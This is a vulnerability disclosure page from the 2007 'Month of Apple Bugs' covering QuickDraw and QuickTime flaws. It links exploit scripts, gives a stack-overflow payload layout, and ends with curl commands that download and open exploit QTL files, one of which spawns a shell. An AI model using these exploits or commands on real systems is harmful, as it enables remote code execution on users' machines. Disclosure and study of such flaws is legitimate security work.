MOAB-23-01-2007: Apple QuickDraw GetSrcBits32ARGB() Memory Corruption Vulnerability

QuickDraw is integrated in Mac OS X since very early versions, used by Quicktime and any other application that needs to handle PICT images. A vulnerability exists in the handling of ARGB records (Alpha RGB) within PICT images, that leads to an exploitable memory corruption condition (ex. denial of service, so-called crash, which can be used to gain root privileges in combination with MOAB-22-01-2007).

For further information:

• Apple QuickDraw GetSrcBits32ARGB() Memory Corruption Vulnerability
• Proof of concept: MOAB-23-01-2007.pct

Apple has released a fix to MOAB-01-01-2007: Security Update 2007-001. They finally acknowledge the MoAB, with some PR crediting wizardry, aka 'let's mention but not explicitly say we are broken'. 22 days to fix a remote arbitrary code execution issue in one of their most extended products, distributed with working exploits for both Microsoft Windows and Mac OS X versions can be considered acceptable timing. Come on, it's not that difficult to change a strcpy() call... is it?

MOAB-03-01-2007: Apple Quicktime HREFTrack Cross-Zone Scripting vulnerability

A month ago, a vulnerability in QuickTime was exploited to spread a worm in MySpace. The vulnerability was first published by pdp. In his article, pdp describes how HREFTrack attribute in .mov files can be used for malicious scripting. The MySpace worm abused this vulnerability in a cross-site scripting attack vector.

This MoAB issue shows that this vulnerability can also be used in a cross-zone scripting attack which could allow, in combination with other vulnerabilities, to remotely execute arbitrary code on the user's machine, as well as disclosure of the filesystem contents.Thanks to Aviv Raff for contributing this nice issue. Thanks to pdp for working around Quicktime scripting issues too.

For further information:

• Apple Quicktime HREFTrack Cross-Zone Scripting vulnerability
• Exploit: MOAB-03-01-2007.rb and MOAB-03-01-2007.mov

MOAB-01-01-2007: Apple Quicktime rtsp URL Handler Stack-based Buffer Overflow

A vulnerability exists in the handling of the rtsp:// URL handler. By supplying a specially crafted string (rtsp:// [random] + colon + [299 bytes padding + payload]), an attacker could overflow a stack-based buffer, using either HTML, Javascript or a QTL file as attack vector, leading to an exploitable remote arbitrary code execution condition.

For further information:

• Details, debugging information and exploitation notes.
  
• Working exploit: MOAB-01-01-2007.rb

Happy New Year!

Update: An example QTL file exploiting this issue (pwnage.qtl) is available (it will say 'happy new year' via /usr/bin/say, and expects the command string to be located at 0x17a053c, tested on Mac OS X 10.4.8 8L2127, x86 architecture). If it doesn't work on your system, use the exploit to generate another QTL with your own options or the shell spawn variant (pwnage-shell.qtl, 100% reliable for a current up-to-date x86-based OS X system). Usage:

$ curl http://projects.info-pull.com/moab/bug-files/pwnage.qtl -o pwnage.qtl
(...)
$ open pwnage.qtl
$ curl http://projects.info-pull.com/moab/bug-files/pwnage-shell.qtl -o pwnage-shell.qtl
(...)
$ open pwnage-shell.qtl